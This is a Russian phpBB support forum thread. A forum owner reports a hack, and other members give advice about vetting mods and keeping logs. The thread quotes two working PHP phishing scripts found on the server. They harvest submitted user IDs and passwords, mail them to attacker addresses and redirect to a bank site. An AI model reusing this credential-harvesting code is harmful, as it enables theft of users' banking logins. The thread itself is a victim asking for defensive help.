Хак Эксплоитом

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 19 лет 2 месяца

Хак Эксплоитом

Сообщение Neonaft »

Ребят, в общем, ощутил на себе проблему хакерства.

Хакнули меня эксплоитом. Только вот цель не понятна.

Позасунули на сервер разных рекламных файлов, типа:

Код: Выделить всё

<?php
$ip = getenv("REMOTE_ADDR");
$datamasii=date("D M d, Y g:i a");
$userid = $HTTP_POST_VARS["userid"];
$userid2 = $HTTP_POST_VARS["userid2"];
$mesaj = "wach by mortal-cr3w
userid : $userid
password : $userid2
----------------------------------------------------
IP : $ip 
DATE : $datamasii
";

$recipient = "mortalcr3w@gmail.com";
$subject = " wach by mortal-cr3w ";

mail($recipient,$subject,$mesaj);
header("Location: http://www.wachovia.com/personal/page/0,,325_492,00.html");
?>
И некоторые файлы были изменены. У меня был изменён login.php

Код: Выделить всё

<?

$ip = getenv("REMOTE_ADDR");
$message .= "------------------------------\n";
$message .= "User ID: ".$_POST['userid']."\n";
$message .= "Password: ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "-------Created By SeRvAr-------\n";



$recipient = "result.alert@gmail.com";
$subject = "Work 4 dAT";
$headers = "From: ";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
	 if (mail($recipient,$subject,$message,$headers))
	   {
		   header("Location: http://www.wachovia.com");

	   }
else
    	   {
 		echo "ERROR! Please go back and try again.";
  	   }

?>
В общем, всё жуткто достало... Спрашиваю совета, чем можно от этого защититься и как избежать?
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 9 месяцев
Откуда: Бердск

Сообщение crash »

Neonaft
версия форума? Точно из-за форума хакнули? какие моды?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 19 лет 2 месяца

Сообщение Neonaft »

Версия форума: 2.0.22

Повреждена только структура форума. На сервер через хостера вроде бы не пробрались.

Модов целая тьма. Форум сильно модифицирован...
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Сообщение Alek$ »

Neonaft писал(а):Модов целая тьма
и один из них оказался дырявым.
Цели хакеров тоже вполне прозрачны...

Совет? Ставить только действительно необходимые и проверенные времеем моды и своевременно их обновлять. Ничего более эффективного никто еще не придумал.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 19 лет 2 месяца

Сообщение Neonaft »

Да уж, только не понятно, что является криетрием надёжности. Ставил моды только с этого сайта и по совету товарищей опять же с этого сайта.
Аватара пользователя
Alek$
Former team member
Сообщения: 2616
Стаж: 19 лет 8 месяцев
Откуда: Новосибирск
Поблагодарили: 3 раза

Сообщение Alek$ »

Одним из критериев является популярность на других ресурсов и отсутствие приписок alpha или beta :)
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Neonaft писал(а):Версия форума: 2.0.22
Есть уверенность в этом?
Neonaft писал(а):Спрашиваю совета, чем можно от этого защититься и как избежать?
В первую очередь нужно было все логи сохранить, чтобы их впоследстивии анализировать.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений

Вернуться в «Поддержка phpBB 2.0.x»